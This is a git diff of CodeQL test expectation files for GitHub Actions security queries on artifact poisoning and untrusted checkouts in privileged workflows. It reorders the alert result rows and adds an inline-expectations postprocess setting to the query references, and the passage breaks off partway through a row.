.github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target | -| .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:18:14:18:24 | npm install | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning96.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref index 4f8d2af04e8d..2f71173a891e 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref @@ -1,2 +1,2 @@ -Security/CWE-829/ArtifactPoisoningCritical.ql - +query: Security/CWE-829/ArtifactPoisoningCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index c0c52e47f5b3..ef09155ec63c 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,3 +1,4 @@ +#select edges | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | @@ -54,4 +55,3 @@ nodes | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref index 39548f274127..177e1b08095a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref @@ -1,2 +1,2 @@ -Security/CWE-829/ArtifactPoisoningMedium.ql - +query: Security/CWE-829/ArtifactPoisoningMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref index 17a2059f7e99..4f3bbb90c2a3 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref @@ -1,2 +1,2 @@ -experimental/Security/CWE-829/ArtifactPoisoningPathTraversal.ql - +query: experimental/Security/CWE-829/ArtifactPoisoningPathTraversal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref index 8c9db66bf6bb..ce9ebe84e530 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref @@ -1 +1,2 @@ -Security/CWE-829/UnpinnedActionsTag.ql +query: Security/CWE-829/UnpinnedActionsTag.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 52fcecfb9ed7..6f478cfcb14c 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,3 +1,43 @@ +#select +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | @@ -337,43 +377,3 @@ edges | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | -#select -| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | 